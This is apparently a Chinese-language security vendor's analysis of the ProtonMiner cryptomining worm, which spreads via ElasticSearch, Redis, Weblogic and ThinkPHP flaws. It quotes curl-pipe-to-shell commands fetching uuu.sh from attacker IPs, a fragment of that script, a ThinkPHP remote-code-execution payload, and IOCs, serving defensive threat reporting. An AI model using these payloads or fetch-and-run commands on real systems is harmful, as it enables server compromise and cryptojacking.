近日,阿里云安全监测到一种挖矿蠕虫,正在互联网上加速传播。阿里云安全根据它使用ProtonMail邮箱地址做为矿池用户名的行为,将其命名为ProtonMiner。据分析,这种蠕虫与TrendMicro于2018年12月曾报导过的“利用ElasticSearch旧漏洞传播的蠕虫”很是类似,多是同一团伙所为。但与先前报导不一样的是,二月中旬,该挖矿蠕虫扩大了攻击面,从仅攻击ElasticSearch这一种服务,变为攻击包括Redis, Weblogic在内的多种服务,传播速度大大加快。php
本文着重描写该挖矿僵尸网络的传播手法,并在文末列出了安全建议,以帮助用户避免遭受感染,或在已被感染的状况下进行清理。数据库
攻击者先控制被感染主机执行如下两条命令之一,从而下载并运行uuu.sh。api
/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh /bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
而uuu.sh脚本运行后,将继续下载挖矿程序和配置文件用于挖矿,以及下载蠕虫木马用于继续攻击未感染主机。安全
入侵脚本uuu.sh,首先会经过试着写入"/etc/devtools"目录,来判断当前帐户是否拥有root权限;脚本的大部分功能,只有当前帐号具备root权限时才会运行。bash
#!/bin/sh echo 1 > /etc/devtools if [ -f "$rtdir" ] then echo "i am root" echo "goto 1" >> /etc/devtools # download & attack fi
该脚本具备典型挖矿事件中恶意脚本的特征:检查并杀死其余僵尸网络的进程、将自身写入系统crontab文件、修改iptables设置从而容许某些端口上的通讯等。然而这一脚本的做者或许更加谨慎:服务器
1.在脚本最后,攻击者清空了命令历史记录微信
2.在挖矿配置文件中,攻击者使用了多个ProtonMail邮箱地址做为链接到矿池的用户名。ProtonMail是世界最大的安全邮件服务提供商,ProtonMiner也是所以而得名。这种使用邮箱地址,而非门罗币钱包地址做为矿池用户名的作法很好地“保护”了攻击者的隐私,也为安全工做者们判断该僵尸网络的规模和收益状况增长了难度。网络
ProtonMiner的横向传播程序名为"systemctI",是一个由Go语言编译的程序。它的main函数以下图所示:app
该程序在运行时,会首先经过_tmp_exe_linx_ipc_Init_ip等方法对要扫描的ip和使用的弱密码进行初始化。过程当中会请求并下载如下两个地址的文件。curl
https://pixeldra.in/api/download/I9RRye (ip地址c段列表)
https://pixeldra.in/api/download/-7A5aP (弱密码列表)
以后程序会进入main_Scan函数,该函数包含大量的扫描和漏洞利用相关子函数。
下表列出了受到该挖矿僵尸网络影响的服务和漏洞:
例如一个ThinkPHP 的payload:
POST /index.php?s=captcha HTTP/1.1%0d%0aHost: ...%0d%0aUser-Agent: Go-http-client/1.1%0d%0aContent-Length:132%0d%0aConnection: close%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aAccept-Encoding:gzip%0d%0a%0d%0a_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
ProtonMiner僵尸网络扩大攻击面以后,传播速度有了显著的提高。从下图能够看出,进入2月份以来,攻击量快速上升,并在2月中旬达到高峰,阿里云观察到已有上千台主机受到感染:
IOC
C&C服务器:
45.76.122.92
207.148.70.143
恶意文件:
矿池地址:
xmr.pool.minergate.com:45700
使用的帐号(邮箱)名:
原文连接 更多技术干货 请关注阿里云云栖社区微信号 :yunqiinsight